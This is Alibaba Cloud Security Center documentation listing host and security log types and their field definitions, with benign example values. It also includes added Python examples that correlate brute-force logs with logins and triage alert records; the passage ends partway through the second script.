This topic was translated by AI and is currently in queue for revision by our editors. Alibaba Cloud does not guarantee the accuracy of AI-translated content.

Log categories and field descriptions

Updated at: 2025-03-27 22:34

By viewing Security Center logs, you can promptly discover, investigate, and respond to security events. After purchasing log analysis storage capacity, Security Center automatically enables security logs and host logs, which record security events and host activities respectively. This article describes the log types supported by Security Center and the field descriptions for each log type.

Log types supported by different editions

Different editions of Security Center support different security capabilities, so the log types recorded when servers are bound to different editions will also vary. The following are the log types supported by each edition:

Server edition: Anti-virus Edition, Pro Edition, Enterprise Edition, Ultimate Edition
  Supported log types: All log types supported by Security Center.

Server edition: Basic Edition
  Supported log types:
    • Host logs
      • Client event logs
    • Security logs
      • Vulnerability logs (only records vulnerabilities supported by the Basic Edition)
      • Security alert logs (only records alerts supported by the Basic Edition)
      • Cloud security posture management logs (logs are only recorded after using the cloud security posture management feature)
      • Application protection logs (logs are only recorded after using the application protection feature)
      • Malicious file detection logs (logs are only recorded after using the malicious file detection feature)
      • Core file monitoring event logs (only records alert events reported after using the core file monitoring feature)

Log categories

Host logs

Login flow logs (__topic__: aegis-log-login)
  Records logs of user logins to servers, including login time, login user, login method, login IP address, and other information.
  Login flow logs can help you monitor user activities and promptly identify and respond to abnormal behaviors, thereby ensuring system security.
  Note: Security Center does not support login flow logs for Windows Server 2008 operating systems.
  Collection cycle: Real-time collection.

Network connection logs (__topic__: aegis-log-network)
  Records logs of network connection activities, including the server connection 5-tuple, connection time, connection status, and other information.
  Network connection logs can help you discover abnormal connection behaviors, identify potential network attacks, optimize network performance, and more.
  Note:
    • Only some of the states a connection passes through between establishment and termination are collected.
    • Inbound traffic is not recorded.
  Collection cycle: Real-time collection.

Process startup logs (__topic__: aegis-log-process)
  Records logs related to process startup on the server, including process start time, startup command, parameters, and other information.
  By recording and analyzing process startup logs, you can understand the startup status and configuration of processes in the system and detect abnormal process activities, malware intrusions, security threats, and other issues.
  Collection cycle: Real-time collection; a process startup is reported as soon as it occurs.

Brute-force attack logs (__topic__: aegis-log-crack)
  Records logs of brute-force attack behaviors, including attempts to log in to and crack systems, applications, or accounts.
  By recording and analyzing brute-force attack logs, you can understand the brute-force attacks on systems or applications and detect abnormal login attempts, weak passwords, and credential leaks. Brute-force attack logs can also be used to track malicious users and perform forensic analysis, assisting security teams in incident response and investigation.
  Collection cycle: Real-time collection.

Account snapshot logs (__topic__: aegis-snapshot-host)
  Records detailed information about user accounts in systems or applications, including basic account attributes such as username, password policy, and login history.
  By comparing account snapshot logs taken at different times, you can understand how user accounts change over time and promptly detect potential account security issues, such as unauthorized account access or abnormal account status.
  Collection cycle:
    • When the asset fingerprint automatic collection feature is enabled, collection is performed automatically according to the set cycle. For more information about asset fingerprint automatic collection, see Asset fingerprint investigation.
    • When the asset fingerprint automatic collection feature is not enabled, each server collects once a day at a non-fixed time.

Network snapshot logs (__topic__: aegis-snapshot-port)
  Records logs of network connections, including the connection 5-tuple, connection status, associated process information, and other fields.
  By recording and analyzing network snapshot logs, you can understand the active network sockets in the system, helping you discover abnormal connection behaviors, identify potential network attacks, and optimize network performance.

Process snapshot logs (__topic__: aegis-snapshot-process)
  Records logs of process activities in the system, including process ID, process name, process start time, and other information.
  By recording and analyzing process snapshot logs, you can understand the activity status and resource usage of processes in the system and detect abnormal processes, CPU usage, memory leaks, and other issues.

DNS request logs (__topic__: aegis-log-dns-query)
  Records logs of DNS query requests sent by the server, including the queried domain name, query type, query source, and other details.
  By analyzing DNS request logs, you can understand DNS query activities in the network and detect abnormal query behaviors, domain hijacking, and DNS poisoning.
  Note: For Linux servers with kernel versions lower than the 4.x series, Security Center does not support the collection of DNS request logs or the detection of malicious DNS behaviors. It is recommended that you upgrade the system kernel to a higher version to obtain comprehensive threat detection capabilities.
  Collection cycle: Real-time collection.

Client event logs (__topic__: aegis-log-client)
  Records the online and offline events of the Security Center client.
  Collection cycle: Real-time collection.

Security log types

Vulnerability logs (__topic__: sas-vul-log)
  Records logs of vulnerability-related information found in systems or applications, including vulnerability name, vulnerability status, handling actions, and other information.
  By recording and analyzing vulnerability logs, you can understand the vulnerabilities, security risks, and attack trends affecting the system and take appropriate remedial measures in a timely manner.
  Collection cycle: Real-time collection.

Baseline logs (__topic__: sas-hc-log)
  Records logs of baseline risk check results, including baseline level, baseline category, risk level, and other information.
  By recording and analyzing baseline risk logs, you can understand the baseline security status and potential risks of the system.
  Note: Only check items that fail for the first time, and check items that previously passed but fail upon re-checking, are recorded.

Security alert logs (__topic__: sas-security-log)
  Records logs of security events and alert information that occur in systems or applications, including alert data source, alert details, alert level, and other information.
  By recording and analyzing security alert logs, you can understand the security events and threats in the system and take appropriate response measures in a timely manner.

Cloud security posture management logs (__topic__: sas-cspm-log)
  Records logs related to cloud security posture management, including check results, whitelist operations, and other information.
  By recording and analyzing cloud security posture management logs, you can understand the configuration issues and potential security risks in the cloud platform.

Network defense logs (__topic__: sas-net-block)
  Records logs of network attack events, including attack type, source IP address, target IP address, and other key information.
  By recording and analyzing network defense logs, you can understand the security events occurring in the network and take corresponding response and defense measures to improve the security and reliability of the network.

Application protection logs (__topic__: sas-rasp-log)
  Records logs of attack alert information from the application protection feature, including attack type, behavioral data, attacker IP, and other key information.
  By recording and analyzing application protection alert logs, you can understand the security events occurring in the application and take corresponding response and defense measures to improve the security and reliability of the application.

Malicious file detection logs (__topic__: sas-filedetect-log)
  Records logs of malicious file detection performed with the malicious file detection SDK, including file information, detection scenario, detection results, and other information.
  By recording and analyzing malicious file detection logs, you can identify common viruses, such as ransomware and mining programs, in offline files and Alibaba Cloud OSS files, and handle them promptly to prevent the spread and execution of malicious files.

Network logs (no longer supported for delivery)

Important
  • Starting from March 27, 2025, the log analysis feature will no longer support the delivery of network logs (including Web access logs, DNS resolution logs, network session logs, and local DNS logs). For alternative solutions for network logs, see Alternative solutions for network log access or delivery.

  • For users who have enabled network log delivery before March 27, 2025, the delivery of corresponding logs will be automatically disabled on March 27, 2025, meaning that new network log data will no longer be delivered. At the same time, the query function for network logs on the Log Analysis page in the Security Center console will be discontinued.

    If you need to query delivered network logs, you can click Advanced Management For Simple Log Service in the upper right corner of the Log Analysis page to go to the Simple Log Service console, and refer to the log field descriptions provided in the appendix of this article to view the delivered network logs.

Web access logs (__topic__: sas-log-http)
  Records logs of user requests to web servers and the web server responses, including HTTP request details such as user IP address, request time, request method, request URL, HTTP status code, and response size.
  Web access logs are typically used to analyze web traffic and user behavior, identify access patterns and anomalies, and optimize website performance.
  Collection cycle: Data is collected with a delay, generally 1-12 hours.

DNS resolution logs (__topic__: sas-log-dns)
  Records detailed information about the DNS resolution process, including requested domain name, query type, client IP address, response value, and other information.
  By analyzing DNS resolution logs, you can understand the request and response process of DNS resolution and detect abnormal resolution behaviors, DNS hijacking, DNS poisoning, and other issues.

Network session logs (__topic__: sas-log-session)
  Records logs of network connections and data transmission, including network session details such as session start time, IP addresses of both parties, and the protocols and ports used.
  Network session logs are typically used to monitor network traffic, identify potential threats, and optimize network performance.

Local DNS logs (__topic__: local-dns)
  Records logs of DNS queries and responses on the local DNS server, including details of local DNS requests and responses such as requested domain name, query type, client IP address, and response value.
  Through local DNS logs, you can understand DNS query activities in the network and detect abnormal query behaviors, domain hijacking, and DNS poisoning.

Host log field descriptions

Login flow logs

instance_id
  Instance ID.
  Example: i-2zeg4zldn8zypsfg****

host_ip
  IP address of the server.
  Example: 192.168.XX.XX

sas_group_name
  Asset group of the server in Security Center.
  Example: default

uuid
  UUID of the server.
  Example: 5d83b26b-b7ca-4a0a-9267-12****

src_ip
  IP address used to log in to the server.
  Example: 221.11.XX.XX

dst_port
  Port used to log in to the server.
  Example: 22

login_type
  Login type. Values include but are not limited to:
    • SSHLOGIN, SSH: SSH login.
    • RDPLOGIN: Remote desktop login.
    • IPCLOGIN: IPC connection login.
  Example: SSH

username
  Login username.
  Example: admin

login_count
  Number of logins. Repeated logins within 1 minute are merged into 1 log entry. For example, a login_count value of 3 indicates that there were 3 repeated logins in the last minute.
  Example: 3

start_time
  Start timestamp in seconds, also used to indicate when the event occurred.
  Example: 1719472214

Network connection logs

cmd_chain
  Process chain.
  Example: [{"9883":"bash -c kill -0 -- -'6274'"} ......]

cmd_chain_index
  Process chain index, which can be used to find the process chain with the same index.
  Example: B184

container_hostname
  Server name inside the container.
  Example: nginx-ingress-controller-765f67fd4d-****

container_id
  Container ID.
  Example: 4181de1e2b20c3397f1c409266dbd5631d1bc5be7af85246b0d****

container_image_id
  Image ID.
  Example: registry-cn-beijing-vpc.ack.aliyuncs.com/acs/aliyun-ingress-controller@sha256:5f281994d9e71a1b1a087365271024991c5b0d0543c48f0****

container_image_name
  Image name.
  Example: registry-cn-beijing-vpc.ack.aliyuncs.com/acs/aliyun-ingress-****

container_name
  Container name.
  Example: nginx-ingress-****

container_pid
  Process ID inside the container.
  Example: 0

net_connect_dir
  Network connection direction. Values:
    • in: Inbound.
    • out: Outbound.
  Example: in

dst_ip
  IP address of the network connection receiver.
    • When the direction (net_connect_dir) is out, it represents the remote host.
    • When the direction (net_connect_dir) is in, it represents the local host.
  Example: 192.168.XX.XX

dst_port
  Port of the network connection receiver.
  Example: 443

instance_id
  Instance ID.
  Example: i-2zeg4zldn8zypsfg****

host_ip
  Server IP address.
  Example: 192.168.XX.XX

parent_proc_name
  File name of the parent process.
  Example: /usr/bin/bash

pid
  Process ID.
  Example: 14275

ppid
  Parent process ID.
  Example: 14268

proc_name
  Process name.
  Example: nginx

proc_path
  Process path.
  Example: /usr/local/nginx/sbin/nginx

proc_start_time
  Process start time.
  Example: N/A

connection_type
  Protocol. Values:
    • tcp: TCP connection.
    • raw: Raw socket.
  Example: tcp

sas_group_name
  Asset group of the server in Security Center.
  Example: default

src_ip
  Source IP address.
  Example: 100.127.XX.XX

src_port
  Source port.
  Example: 41897

srv_comm
  Command name of the grandparent process (the parent of the parent process).
  Example: containerd-shim

status
  Network connection status. Values:
    • 1: Connection closed (closed).
    • 2: Waiting for a connection request (listen).
    • 3: SYN request sent (syn send).
    • 4: SYN request received (syn recv).
    • 5: Connection established (established).
    • 6: Waiting to close the connection (close wait).
    • 7: Closing the connection (closing).
    • 8: Waiting for the other party to send a close request (fin_wait1).
    • 9: Waiting for the other party to send a close request and confirm (fin_wait2).
    • 10: Waiting long enough to ensure that the other party has received the confirmation of the close request (time_wait).
    • 11: Transmission control block deleted (delete_tcb).
  Example: 5

type
  Type of real-time network connection. Values:
    • connect: Actively initiates a TCP connection.
    • accept: Accepts an incoming TCP connection.
    • listen: Port listening.
  Example: listen

uid
  ID of the process user.
  Example: 101

username
  Username of the process.
  Example: root

uuid
  UUID of the server.
  Example: 5d83b26b-b7ca-4a0a-9267-12****

start_time
  Start timestamp in seconds, also used to indicate when the event occurred.
  Example: 1719472214

Process startup logs

cmd_chain
  Process chain.
  Example: [{"9883":"bash -c kill -0 -- -'6274'"} ......]

cmd_chain_index
  Process chain index, which can be used to find the process chain with the same index.
  Example: B184

cmd_index
  Indices of the parameters in the command line, in pairs: each pair gives the start and end index of one parameter.
  Example: 0,3,5,8

cmdline
  Complete command line for process startup.
  Example: ipset list KUBE-6-CLUSTER-IP

comm
  Command name associated with the process.
  Example: N/A

container_hostname
  Server name inside the container.
  Example: nginx-ingress-controller-765f67fd4d-****

container_id
  Container ID.
  Example: 4181de1e2b20c3397f1c409266dbd5631d1bc5be7af85246b0d****

container_image_id
  Image ID.
  Example: registry-cn-beijing-vpc.ack.aliyuncs.com/acs/aliyun-ingress-controller@sha256:5f281994d9e71a1b1a087365271024991c5b0d0543c48f0****

container_image_name
  Image name.
  Example: registry-cn-beijing-vpc.ack.aliyuncs.com/acs/aliyun-ingress-****

container_name
  Container name.
  Example: nginx-ingress-****

container_pid
  Process ID inside the container.
  Example: 0

cwd
  Working directory of the process.
  Example: N/A

proc_name
  Process file name.
  Example: ipset

proc_path
  Complete path of the process file.
  Example: /usr/sbin/ipset

gid
  Group ID of the process.
  Example: 0

groupname
  User group.
  Example: group1

instance_id
  Instance ID.
  Example: i-2zeg4zldn8zypsfg****

host_ip
  Server IP address.
  Example: 192.168.XX.XX

parent_cmd_line
  Command line of the parent process.
  Example: /usr/local/bin/kube-proxy --config=/var/lib/kube-proxy/config.conf --hostname-override=cn-beijing.192.168.XX.XX

parent_proc_name
  File name of the parent process.
  Example: kube-proxy

parent_proc_path
  Complete path of the parent process file.
  Example: /usr/local/bin/kube-proxy

pid
  Process ID.
  Example: 14275

ppid
  Parent process ID.
  Example: 14268

proc_start_time
  Process start time.
  Example: 2024-08-01 16:45:40

parent_proc_start_time
  Start time of the parent process.
  Example: 2024-07-12 19:45:19

sas_group_name
  Asset group of the server in Security Center.
  Example: default

srv_cmd
  Command line of the ancestor process.
  Example: /usr/bin/containerd

tty
  Login terminal. N/A indicates that the account has never logged in to a terminal.
  Example: N/A

uid
  User ID.
  Example: 123

username
  Username of the process.
  Example: root

uuid
  UUID of the server.
  Example: 5d83b26b-b7ca-4a0a-9267-12****

start_time
  Start timestamp in seconds, also used to indicate when the event occurred.
  Example: 1719472214

Brute-force attack logs

instance_id
  Instance ID.
  Example: i-2zeg4zldn8zypsfg****

host_ip
  IP address of the server being brute-forced.
  Example: 192.168.XX.XX

sas_group_name
  Asset group of the server in Security Center.
  Example: default

uuid
  UUID of the server being brute-forced.
  Example: 5d83b26b-b7ca-4a0a-9267-12*****

login_count
  Number of failed logins. Repeated login attempts within 1 minute are merged into 1 log entry. For example, a login_count value of 3 indicates that there were 3 repeated attempts in the last minute.
  Example: 3

src_ip
  Source IP address of the login.
  Example: 47.92.XX.XX

dst_port
  Login port.
  Example: 22

login_type
  Login type. Values:
    • SSHLOGIN, SSH: SSH login.
    • RDPLOGIN: Remote desktop login.
    • IPCLOGIN: IPC connection login.
  Example: SSH

username
  Login username.
  Example: user

start_time
  Start timestamp in seconds, also used to indicate when the event occurred.
  Example: 1719472214
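As an added example that is not part of this article or of Security Center itself, the following Python script correlates the login flow fields (aegis-log-login) with the brute-force attack fields (aegis-log-crack) described above, flagging a successful login that follows a burst of failed attempts from the same source IP against the same server. The records, server UUIDs, IP addresses and thresholds are constructed for illustration and are not real Security Center output.

```python
"""Correlate Security Center login flow logs (__topic__ aegis-log-login) with
brute-force attack logs (__topic__ aegis-log-crack).

A successful login is flagged when the same src_ip produced at least
MIN_FAILED_ATTEMPTS merged failed attempts (login_count) against the same
server uuid within WINDOW_SECONDS before the success.
"""
from collections import defaultdict
from dataclasses import dataclass

WINDOW_SECONDS = 30 * 60       # look-back window (assumed threshold)
MIN_FAILED_ATTEMPTS = 10       # merged failures needed to count as brute force (assumed)

# Constructed sample records modelled on the field descriptions in this
# article. Values are strings, as delivered by Simple Log Service.
SAMPLE_LOGS = [
    # Two minutes of failed SSH logins against srv-uuid-1 (6 + 5 attempts)
    {"__topic__": "aegis-log-crack", "uuid": "srv-uuid-1", "src_ip": "203.0.113.7",
     "dst_port": "22", "login_type": "SSH", "username": "root",
     "login_count": "6", "start_time": "1719472000"},
    {"__topic__": "aegis-log-crack", "uuid": "srv-uuid-1", "src_ip": "203.0.113.7",
     "dst_port": "22", "login_type": "SSH", "username": "root",
     "login_count": "5", "start_time": "1719472060"},
    # The same source then logs in successfully as root
    {"__topic__": "aegis-log-login", "uuid": "srv-uuid-1", "src_ip": "203.0.113.7",
     "dst_port": "22", "login_type": "SSH", "username": "root",
     "login_count": "1", "start_time": "1719472214"},
    # Benign: an admin login from a source with no failure history
    {"__topic__": "aegis-log-login", "uuid": "srv-uuid-1", "src_ip": "198.51.100.20",
     "dst_port": "22", "login_type": "SSH", "username": "admin",
     "login_count": "1", "start_time": "1719472300"},
    # Too few failures, and far outside the window: not flagged by default
    {"__topic__": "aegis-log-crack", "uuid": "srv-uuid-2", "src_ip": "192.0.2.9",
     "dst_port": "3389", "login_type": "RDPLOGIN", "username": "Administrator",
     "login_count": "2", "start_time": "1719400000"},
    {"__topic__": "aegis-log-login", "uuid": "srv-uuid-2", "src_ip": "192.0.2.9",
     "dst_port": "3389", "login_type": "RDPLOGIN", "username": "Administrator",
     "login_count": "1", "start_time": "1719472400"},
]


@dataclass(frozen=True)
class Finding:
    uuid: str
    src_ip: str
    username: str
    dst_port: int
    failed_attempts: int
    seconds_since_last_failure: int


def correlate(records, window=WINDOW_SECONDS, min_failed=MIN_FAILED_ATTEMPTS):
    """Return one Finding per successful login whose source IP brute-forced
    the same server shortly before. Records are processed in time order."""
    failures = defaultdict(list)          # (uuid, src_ip) -> [(start_time, login_count)]
    findings = []
    for rec in sorted(records, key=lambda r: int(r["start_time"])):
        key = (rec["uuid"], rec["src_ip"])
        ts = int(rec["start_time"])
        if rec["__topic__"] == "aegis-log-crack":
            # login_count already merges repeats within one minute
            failures[key].append((ts, int(rec["login_count"])))
            continue
        if rec["__topic__"] != "aegis-log-login":
            continue
        # Only failures that happened inside the window before this success count
        recent = [(t, n) for t, n in failures[key] if 0 <= ts - t <= window]
        total_failed = sum(n for _, n in recent)
        if recent and total_failed >= min_failed:
            last_failure = max(t for t, _ in recent)
            findings.append(Finding(
                uuid=rec["uuid"], src_ip=rec["src_ip"], username=rec["username"],
                dst_port=int(rec["dst_port"]), failed_attempts=total_failed,
                seconds_since_last_failure=ts - last_failure))
    return findings


if __name__ == "__main__":
    for f in correlate(SAMPLE_LOGS):
        print(f"[{f.uuid}] {f.src_ip} logged in as {f.username} on port {f.dst_port} "
              f"after {f.failed_attempts} failed attempts "
              f"({f.seconds_since_last_failure}s after the last failure)")
```

Lowering the thresholds (for example `min_failed=2` with a larger window) also surfaces the RDP case, which shows how the two knobs trade noise against missed successes.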

Account snapshot logs

account_expire
  Account expiration time. never indicates that the account never expires.
  Example: never

domain
  Domain or directory service where the account is located. N/A indicates that it does not belong to any domain.
  Example: N/A

groups
  Groups to which the account belongs. N/A indicates that it does not belong to any group.
  Example: ["nscd"]

home_dir
  Home directory, the default location for storing and managing the account's files in the system.
  Example: /Users/abc

instance_id
  Instance ID.
  Example: i-2zeg4zldn8zypsfg****

host_ip
  Server IP address.
  Example: 192.168.XX.XX

last_chg
  Date of the last password change.
  Example: 2022-11-29

last_logon
  Date and time of the last account login. N/A indicates that the account has never logged in.
  Example: 2023-08-18 09:21:21

login_ip
  Remote IP address of the last account login. N/A indicates that the account has never logged in.
  Example: 192.168.XX.XX

passwd_expire
  Password expiration date. never indicates that the password never expires.
  Example: 2024-08-24

perm
  Whether the account has root permissions. Values:
    • 0: No root permissions.
    • 1: Has root permissions.
  Example: 0

sas_group_name
  Asset group of the server in Security Center.
  Example: default

shell
  Login shell of the account on Linux.
  Example: /sbin/nologin

status
  Status of the user account. Values:
    • 0: Account is prohibited from logging in.
    • 1: Account can log in normally.
  Example: 0

tty
  Login terminal. N/A indicates that the account has never logged in to a terminal.
  Example: N/A

username
  Username.
  Example: nscd

uuid
  UUID of the server.
  Example: 5d83b26b-b7ca-4a0a-9267-12****

warn_time
  Password expiration reminder date. never indicates no reminder.
  Example: 2024-08-20

start_time
  Start timestamp in seconds, also used to indicate when the event occurred.
  Example: 1719472214

Network snapshot logs

net_connect_dir
  Network connection direction. Values:
    • in: Inbound.
    • out: Outbound.
  Example: in

dst_ip
  IP address of the network connection receiver.
    • When the direction (net_connect_dir) is out, it represents the remote host.
    • When the direction (net_connect_dir) is in, it represents the local host.
  Example: 192.168.XX.XX

dst_port
  Port of the network connection receiver.
  Example: 443

instance_id
  Instance ID.
  Example: i-2zeg4zldn8zypsfg****

host_ip
  Server IP address.
  Example: 192.168.XX.XX

pid
  Process ID.
  Example: 682

proc_name
  Process name.
  Example: sshd

connection_type
  Protocol. Values:
    • tcp4: TCP connection over IPv4.
    • tcp6: TCP connection over IPv6.
  Example: tcp4

sas_group_name
  Asset group of the server in Security Center.
  Example: default

src_ip
  Source IP address.
  Example: 100.127.XX.XX

src_port
  Source port.
  Example: 41897

status
  Network connection status. Values:
    • 1: Connection closed (closed).
    • 2: Waiting for a connection request (listen).
    • 3: SYN request sent (syn send).
    • 4: SYN request received (syn recv).
    • 5: Connection established (established).
    • 6: Waiting to close the connection (close wait).
    • 7: Closing the connection (closing).
    • 8: Waiting for the other party to send a close request (fin_wait1).
    • 9: Waiting for the other party to send a close request and confirm (fin_wait2).
    • 10: Waiting long enough to ensure that the other party has received the confirmation of the close request (time_wait).
    • 11: Transmission control block deleted (delete_tcb).
  Example: 5

uuid
  UUID of the server.
  Example: 5d83b26b-b7ca-4a0a-9267-12****

start_time
  Start timestamp in seconds, also used to indicate when the event occurred.
  Example: 1719472214

Process snapshot logs

cmdline
  Complete command line for process startup.
  Example: /usr/local/share/assist-daemon/assist_daemon

instance_id
  Instance ID.
  Example: i-2zeg4zldn8zypsfg****

host_ip
  Server IP address.
  Example: 192.168.XX.XX

md5
  MD5 hash value of the binary file.
  Note: MD5 calculation is not performed for process files larger than 1 MB.
  Example: 1086e731640751c9802c19a7f53a64f5

proc_name
  Process file name.
  Example: assist_daemon

proc_path
  Complete path of the process file.
  Example: /usr/local/share/assist-daemon/assist_daemon

pid
  Process ID.
  Example: 1692

pname
  Parent process file name.
  Example: systemd

sas_group_name
  Asset group of the server in Security Center.
  Example: default

proc_start_time
  Process start time. Built-in field.
  Example: 2023-08-18 20:00:12

uid
  ID of the process user.
  Example: 101

username
  Username of the process.
  Example: root

uuid
  UUID of the server.
  Example: 5d83b26b-b7ca-4a0a-9267-12****

start_time
  Start timestamp in seconds, also used to indicate when the event occurred.
  Example: 1719472214

DNS request logs

domain
  Domain name corresponding to the DNS request.
  Example: example.aliyundoc.com

instance_id
  Instance ID.
  Example: i-2zeg4zldn8zypsfg****

host_ip
  IP address of the server that initiated the DNS request.
  Example: 192.168.XX.XX

pid
  ID of the process that initiated the DNS request.
  Example: 3544

ppid
  ID of the parent of the process that initiated the DNS request.
  Example: 3408

cmd_chain
  Process chain that initiated the DNS request.
  Example: "3544":"\"C:\\Program Files (x86)\\Alibaba\\Aegis\\AliDetect\\AliDetect.exe\""

cmdline
  Command line that initiated the DNS request.
  Example: C:\Program Files (x86)\Alibaba\Aegis\AliDetect\AliDetect.exe

proc_path
  Path of the process that initiated the DNS request.
  Example: C:/Program Files (x86)/Alibaba/Aegis/AliDetect/AliDetect.exe

sas_group_name
  Asset group of the server in Security Center.
  Example: default

time
  Time when the DNS request event was captured, which is generally the same as when the DNS request occurred.
  Example: 2023-08-17 20:05:04

uuid
  UUID of the server that initiated the DNS request.
  Example: 5d83b26b-b7ca-4a0a-9267-12****

start_time
  Start timestamp in seconds, also used to indicate when the event occurred.
  Example: 1719472214

Client event logs

uuid
  UUID of the server.
  Example: 5d83b26b-b7ca-4a0a-9267-12****

host_ip
  Server IP address.
  Example: 192.168.XX.XX

agent_version
  Client version.
  Example: aegis_11_91

last_login
  Timestamp of the last login. Unit: milliseconds.
  Example: 1716444387617

platform
  Operating system type. Values:
    • windows
    • linux
  Example: linux

region_id
  Region ID where the server is located.
  Example: cn-beijing

status
  Client status. Values:
    • online
    • offline
  Example: online

start_time
  Start timestamp in seconds, also used to indicate when the event occurred.
  Example: 1719472214

Security log field descriptions

Vulnerability logs

vul_alias_name
  Vulnerability alias.
  Example: CESA-2023:1335: openssl Security Update

risk_level
  Risk level. Values:
    • asap: High
    • later: Medium
    • nntf: Low
  Example: later

extend_content
  Extended vulnerability information.
  Example: {"cveList":["CVE-2023-0286"],"necessity":{"gmt_create":"20230816","connect_cnt":80,"total_score":0.0,"assets_factor":1.0,"enviroment_factor":1.5,"status":"normal"},"os":"centos","osRelease":"7","preCheck":{},"rpmCanUpdate":true,"rpmEntityList":[{"fullVersion":"1.0.2k-25.el7_9","kernel":false,"matchDetail":"openssl-libs version less than 1.0.2k-26.el7_9","matchList":["openssl-libs version less than 1.0.2k-26.el7_9"],"name":"openssl-libs","nextResult":false,"path":"/etc/pki/tls","result":true,"updateCmd":"yum update openssl-libs","version":"1.0.2k-25.el7_9"},{"fullVersion":"1.0.2k-25.el7_9","kernel":false,"matchDetail":"openssl version less than 1.0.2k-26.el7_9","matchList":["openssl version less than 1.0.2k-26.el7_9"],"name":"openssl","nextResult":false,"path":"/etc/pki/CA","result":true,"updateCmd":"yum update openssl","version":"1.0.2k-25.el7_9"}]}

instance_id
  Instance ID.
  Example: i-2zeg4zldn8zypsfg****

internet_ip
  Public IP address of the asset.
  Example: 39.104.XX.XX

intranet_ip
  Private IP address of the asset.
  Example: 192.168.XX.XX

instance_name
  Host name.
  Example: hhht-linux-***

vul_name
  Vulnerability name.
  Example: centos:7:cesa-2023:1335

operation
  Handling action for the vulnerability. Values:
    • new: New.
    • verify: Verify.
    • fix: Fix.
  Example: new

status
  Status information. Values:
    • 1: Not fixed.
    • 2: Fix failed.
    • 3: Rollback failed.
    • 4: Fixing.
    • 5: Rolling back.
    • 6: Verifying.
    • 7: Fix successful.
    • 8: Fix successful, restart required.
    • 9: Rollback successful.
    • 10: Ignored.
    • 11: Rollback successful, restart required.
    • 12: No longer exists.
    • 13: Expired.
  Example: 1

tag
  Vulnerability tag. Values:
    • oval: Linux software vulnerability.
    • system: Windows system vulnerability.
    • cms: Web-CMS vulnerability.
  Note: Tags for other types of vulnerabilities are random strings.
  Example: oval

type
  Vulnerability type. Values:
    • sys: Windows system vulnerability.
    • cve: Linux software vulnerability.
    • cms: Web-CMS vulnerability.
    • emg: Emergency vulnerability.
  Example: sys

uuid
  Server UUID.
  Example: ad66133a-dc82-4e5e-9659-a49e3****

start_time
  Start timestamp in seconds, also used to indicate when the event occurred.
  Example: 1719472214

Baseline logs

check_item_name
  Check item name.
  Example: Set minimum password change interval

check_item_level
  Baseline check level. Values:
    • high: High risk.
    • medium: Medium risk.
    • low: Low risk.
  Example: medium

check_type
  Check item type.
  Example: Identity authentication

instance_id
  Instance ID.
  Example: i-2zeg4zldn8zypsfg****

risk_level
  Risk item level. Values:
    • high: High.
    • medium: Medium.
    • low: Low.
  Example: medium

operation
  Operation information. Values:
    • new: New.
    • verity: Verify.
  Example: new

risk_name
  Risk item name.
  Example: Password policy compliance detection

sas_group_name
  Asset group, in Security Center, of the server on which the current risk item was detected.
  Example: default

status
  Status information. Values:
    • 1: Not fixed.
    • 2: Fix failed.
    • 3: Rollback failed.
    • 4: Fixing.
    • 5: Rolling back.
    • 6: Verifying.
    • 7: Fix successful.
    • 8: Fix successful, restart required.
    • 9: Rollback successful.
    • 10: Ignored.
    • 11: Rollback successful, restart required.
    • 12: No longer exists.
    • 13: Expired.
  Example: 1

sub_type_alias_name
  Subtype alias (Chinese).
  Example: International common security best practices-Ubuntu 16/18/20/22 security baseline check

sub_type_name
  Baseline subtype name. For baseline subtype values, see Baseline types and subtypes list.
  Example: hc_ubuntu16_cis_rules

type_alias_name
  Type alias (Chinese).
  Example: International common security best practices

type_name
  Baseline type. For baseline type values, see Baseline types and subtypes list.
  Example: cis

uuid
  UUID of the server on which the current risk item was detected.
  Example: 1ad66133a-dc82-4e5e-9659-a49e3****

start_time
  Start timestamp in seconds, also used to indicate when the event occurred.
  Example: 1719472214

Security alert logs

Field name

Description

Example

Field name

Description

Example

data_source

Data source. Values:

  • aegis_suspicious_event: Host anomaly.

  • aegis_suspicious_file_v2: Webshell.

  • aegis_login_log: Abnormal login.

  • honeypot: Cloud honeypot alert event.

  • object_scan: File detection anomaly event.

  • security_event: Security Center anomaly event.

  • sas_ak_leak: AK leak event.

aegis_login_log

detail

Alert details.

Note

The content of the detail field varies depending on the alert type. If you have questions about parameters in the detail field when viewing alert logs, you can contact technical support by submitting a ticket.

{"loginSourceIp":"221.11.XX.XX","loginDestinationPort":22,"loginUser":"root","protocol":2,"protocolName":"SSH","clientIp":"192.168.XX.XX","loginTimes":1,"location":"Xi'an","type":"login_common_account","displayEventName":"ECS non-common account login","status":0}

instance_id

Instance ID.

i-2zeg4zldn8zypsfg****

internet_ip

Public IP address of the asset.

39.104.XX.XX

intranet_ip

Private IP address of the asset.

192.168.XX.XX

level

Risk level of the alert event. Values:

  • serious: Urgent.

  • suspicious: Suspicious.

  • remind: Reminder.

suspicious

name

Alert name.

Abnormal login-ECS non-common account login

operation

Operation information. Values:

  • new: New.

  • dealing: Processing.

  • update: Update.

new

status

Alert status. Values:

  • 0: All.

  • 1: Pending.

  • 2: Ignored.

  • 4: Confirmed.

  • 8: Marked as false positive.

  • 16: Processing.

  • 32: Processed.

  • 64: Expired.

  • 128: Deleted.

  • 512: Auto-blocking.

  • 513: Auto-blocking completed.

1

unique_info

Unique identifier of the alert.

2536dd765f804916a1fa3b9516b5****

uuid

UUID of the server that generated the alert.

ad66133a-dc82-4e5e-9659-a49e3****

start_time

Start timestamp in seconds, also used to indicate when the event occurred.

1719472214
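
The status codes and the type-dependent detail field above are what an analyst has to decode when consuming these records from Log Service. The following Python script is an added example, not code from the original page or from Security Center: it triages a handful of constructed alert records in the documented field layout, keeping only alerts in an open status, ranking them by level, mapping status codes to their names, and, for aegis_login_log alerts, parsing detail to flag root logins from outside an assumed set of trusted networks. OPEN_STATUSES, TRUSTED_LOGIN_NETWORKS and all sample records are assumptions made for this example.

```python
import ipaddress
import json

# Status codes as documented for the `status` field of security alert logs.
STATUS_NAMES = {
    0: "all", 1: "pending", 2: "ignored", 4: "confirmed", 8: "false_positive",
    16: "processing", 32: "processed", 64: "expired", 128: "deleted",
    512: "auto_blocking", 513: "auto_blocking_completed",
}
# Assumption for this example: these statuses still need an analyst's attention.
OPEN_STATUSES = {1, 16, 512}
LEVEL_RANK = {"remind": 1, "suspicious": 2, "serious": 3}
# Assumption for this example: networks from which administrative logins are expected.
TRUSTED_LOGIN_NETWORKS = [ipaddress.ip_network(n) for n in ("10.0.0.0/8", "192.168.0.0/16")]

# Constructed sample records in the documented field layout (not real log data).
SAMPLE_ALERTS = [
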